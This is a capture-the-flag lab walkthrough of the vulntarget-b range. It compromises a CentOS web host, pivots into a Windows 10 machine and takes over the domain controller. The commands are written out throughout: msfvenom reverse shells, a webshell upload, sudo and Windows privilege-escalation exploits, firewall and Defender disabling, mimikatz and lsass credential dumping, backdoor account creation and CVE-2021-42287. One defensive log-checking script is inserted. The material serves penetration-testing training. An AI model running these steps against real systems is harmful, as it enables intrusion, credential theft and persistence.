[Lab series] vulntarget-b lab walkthrough

Notes on the vulntarget lab series, written while learning internal-network penetration testing.

External CentOS 7 host

Web foothold

A scaninfo scan showed a number of open ports and web services.


Getting a webshell with AntSword

I tried the unauthenticated phpMyAdmin access on the BT (Baota) panel, with no result, so I turned to the JiZhiCMS (极致CMS) on port 81.

The admin login CAPTCHA does not refresh, so the weak credentials admin:admin123 were brute-forced.

After some searching I learned that the backend has an online-editing plugin that can be used to get a shell.


Write a one-line webshell into the directory and connect with AntSword.


After connecting, the shell runs as the www user, and many commands cannot be executed:

(www:ret=127) $ whoami
ret=127

The bypass_disable_function plugin successfully bypasses this.


Getting a Meterpreter session (MSF)

Generate a reverse TCP payload and start a listener on Kali:

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.1.214 lport=4444 -f elf -o 4444.elf

┌──(root💀kali)-[~]
└─# msfconsole -q
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.1.214
lhost => 192.168.1.214
msf6 exploit(multi/handler) > run

Upload the payload with AntSword, chmod +x it and run it to obtain a session.


Privilege escalation

The session obtained belongs to the www user, so the next step is privilege escalation.

Use MSF to automatically check for local privilege-escalation vulnerabilities:

meterpreter > run post/multi/recon/local_exploit_suggester

[*] 192.168.1.104 - Collecting local exploits for x64/linux...
[*] 192.168.1.104 - 40 exploit checks are being tried...
[+] 192.168.1.104 - exploit/linux/local/network_manager_vpnc_username_priv_esc: The service is running, but could not be validated.
[+] 192.168.1.104 - exploit/linux/local/ptrace_traceme_pkexec_helper: The target appears to be vulnerable.
[+] 192.168.1.104 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable. sudo 1.8.23 is a vulnerable build

Based on the description, try the exploit/linux/local/sudo_baron_samedit module.

The attack failed, but the module suggested selecting target 12.


After selecting target 12 and running again, a root session was obtained directly.


Grabbed /etc/shadow and cracked the password root:root.


Internal Windows host

Information gathering

Running ipconfig reveals an internal network.


Uploaded fscan to scan the internal network, but it found nothing; presumably ping is disabled on the internal network.


Checking the ARP cache with arp also shows no internal hosts.


Add a route so the internal network is reachable:

meterpreter > run post/multi/manage/autoroute

Start a SOCKS proxy:

msf6 exploit(linux/local/sudo_baron_samedit) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options 

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server


msf6 auxiliary(server/socks_proxy) > run

On Kali, run nmap through the proxy with -Pn to skip host discovery and -p for common ports; nothing useful came back:

proxychains nmap -Pn -sT -p 21,22,145,3306,80,8080 10.0.20.0/24

Using MSF's built-in port-scanning module instead finds one internal host with port 8080 open:

 use auxiliary/scanner/portscan/tcp
 set rhosts 10.0.20.0/24
 set ports 21,22,80,135,139,443,445,8080
 set threads 30

ZenTao getshell

Accessing the host on port 8080 through the Kali proxy shows a ZenTao web service.


Logged in with the weak credentials admin/Admin123; the version is 12.4.2, so I searched for known vulnerabilities in historical versions.

There is an authenticated backend getshell: https://www.secpulse.com/archives/146782.html

Use the system's Python 2 to start an HTTP server so the payload on the external host can be downloaded:

meterpreter > shell
Process 15094 created.
Channel 7970 created.
pwd
/www/wwwroot/jizhi/install
python -m SimpleHTTPServer 1234

Base64-encode the download URL.


Exploit request: http://192.168.159.129:8080/index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6MTIzNC95dC5waHA=

The response reports a successful save.

Access the webshell at http://10.0.20.66:8080/data/client/1/yt.php; with the Kali proxy configured, AntSword connects.
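As an added example (not part of the original write-up), the check below decodes the base64 link parameter of ZenTao's client download endpoint in constructed access-log lines and flags requests whose download source is an internal address or is not https; the log format, the line contents and the client IPs are assumptions.

```python
import base64
import ipaddress
import re
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines (not from the original post). The first mirrors the
# request shape the write-up uses; the second fetches a public https URL; the third is unrelated.
SAMPLE_LOG = """\
10.0.20.30 - - [25/Mar/2022:21:14:09 +0800] "GET /index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6MTIzNC95dC5waHA= HTTP/1.1" 200 512
10.0.20.5 - - [25/Mar/2022:21:15:01 +0800] "GET /index.php?m=client&f=download&version=1&link=aHR0cHM6Ly93d3cuemVudGFvLm5ldC9jbGllbnQuemlw HTTP/1.1" 200 512
10.0.20.5 - - [25/Mar/2022:21:16:44 +0800] "GET /index.php?m=my&f=index HTTP/1.1" 200 2048
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_link(raw):
    """Decode the base64 link= parameter; None if it is not valid base64."""
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def is_internal_host(host):
    """True for loopback/private/link-local targets: the server should never be told to fetch from inside the network."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return ip.is_private or ip.is_loopback or ip.is_link_local

def suspicious_downloads(log_text):
    """Return (client_ip, decoded_link, reason) for every m=client&f=download request
    whose link is undecodable, points inside the network, or is not https."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlparse(m.group(1)).query)
        if qs.get("m") != ["client"] or qs.get("f") != ["download"] or "link" not in qs:
            continue
        client_ip = line.split()[0]
        link = decode_link(qs["link"][0])
        if link is None:
            hits.append((client_ip, qs["link"][0], "link is not valid base64"))
            continue
        target = urlparse(link)  # urlparse lower-cases the scheme, so HTTP:// is handled
        if is_internal_host(target.hostname or ""):
            hits.append((client_ip, link, "download source is an internal address"))
        elif target.scheme != "https":
            hits.append((client_ip, link, "non-https download source"))
    return hits
```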


The webshell runs as the low-privileged IIS user, and a second network adapter is present.


tasklist -v shows Huorong (火绒) antivirus running.


Getting a Meterpreter session (MSF)

Try using the CentOS host as a pivot: Kali listens, and the internal host connects to Kali through CentOS to deliver the session.

On the external host, run ew to listen on port 1080 and forward traffic to port 4444, where Kali is listening:

[root@localhost install]# ./ew_for_linux64 -s lcx_tran -l 1080 -f 192.168.1.214 -g 4444
lcx_tran 0.0.0.0:1080 <--[10000 usec]--> 192.168.1.214:4444

On Kali, generate a reverse TCP payload and use Yanri (掩日) for AV evasion:

┌──(root💀kali)-[~]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.104 lport=4444 -f exe -o 1.exe

When uploading the payload with AntSword, the connection to the internal network through Kali's MSF proxy was extremely slow.

Since the external host is already compromised, run an ew SOCKS server there instead and use that port to reach the internal network:

[root@localhost install]# ./ew_for_linux64 -s ssocksd -l 2938
ssocksd 0.0.0.0:2938 <--[10000 usec]--> socks server

Running the payload through AntSword, ew on the external host reports an error.


Troubleshooting showed that when generating the payload, lhost should be the external host's internal address, 10.0.20.30. After that MSF got a session, but it dropped shortly after going idle; probably an issue with ew's internal design?


I then switched to frp, mapping port 3289 on the internal host to port 3289 on the external host. Generate a bind TCP payload, run it together with frpc on the internal host, and connect from Kali to port 3289 on the external host to get a session on the internal host.

frpc.ini

[common]
server_addr = 10.0.20.30
server_port = 7000

[adwdsa]
type = tcp
local_ip = 127.0.0.1
local_port = 3289
remote_port = 3289

Add a route:

meterpreter > run post/multi/manage/autoroute

Privilege escalation

Check for privilege-escalation vulnerabilities:

meterpreter > run post/multi/recon/local_exploit_suggester

[*] fe80::d08d:a6b4:c348:c39b - Collecting local exploits for x64/windows...
[*] fe80::d08d:a6b4:c348:c39b - 28 exploit checks are being tried...
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/bits_ntlm_token_impersonation: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The target appears to be vulnerable. Vulnerable Windows 10 v1909 build detected!
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_0796_smbghost: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_1313_system_orchestrator: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2020_17136: The target appears to be vulnerable. A vulnerable Windows 10 v1909 build was detected!
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/cve_2021_1732_win32k: The target appears to be vulnerable.
[+] fe80::d08d:a6b4:c348:c39b - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.

Use exploit/windows/local/cve_2021_1732_win32k.

First, change the internal-network route to go through the external host's session:

msf6 exploit(windows/local/cve_2021_1732_win32k) > route remove 10.0.20.0 255.255.255.0 9 
[*] Route removed
msf6 exploit(windows/local/cve_2021_1732_win32k) > route add 10.0.20.0  255.255.255.0  2

Listen on any port on the internal network; the attack may fail, so run it a few times:

msf6 exploit(windows/local/cve_2021_1732_win32k) > set lhost 10.0.20.30
msf6 exploit(windows/local/cve_2021_1732_win32k) > set lport 4321
msf6 exploit(windows/local/cve_2021_1732_win32k) > set session 9
msf6 exploit(windows/local/cve_2021_1732_win32k) > run

[*] Started reverse TCP handler on 10.0.20.30:4321 via the meterpreter on session 2
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad to host the DLL...
[+] Process 1088 launched.
[*] Reflectively injecting the DLL into 1088...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Exploit completed, but no session was created.

Later I found that a plain getsystem also escalates privileges.

meterpreter > getsystem 
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Process migration

meterpreter > run post/windows/manage/migrate

[*] Running module against WIN10
[*] Current server process: notepad.exe (6732)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 3504
[+] Successfully migrated into process 3504

Disabling the firewall and AV

netsh advfirewall set allprofiles state off
net stop windefend

Tried taskkill /pid xxx /F to stop Huorong, but it errored; after looking it up, AV products protect their own processes.


Information gathering

systeminfo shows a domain environment.


Dumping credentials

meterpreter > load kiwi
meterpreter > creds_all

Decrypted and recorded:

  • WIN10/Administrator:admin@123
  • VULTARGET/win101:admin#123

Read the flag


Enable Remote Desktop

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

After configuring the proxy, log in directly as administrator (an extra account could also be added for the login).

proxychains remmina

arp


Domain controller

fscan locates the domain controller.


CVE-2021-42287

proxychains python sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

Add a user:

net user john admin@123 /add
net localgroup administrators john /add

Enable 3389 (three commands):

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

From Kali, remmina logs in remotely successfully.


Configure a shared folder in remmina, upload procdump and run it (from a cmd started as administrator):

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

Transfer the generated dump back and inspect it with mimikatz:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

This yields several usernames and NTLM hashes.
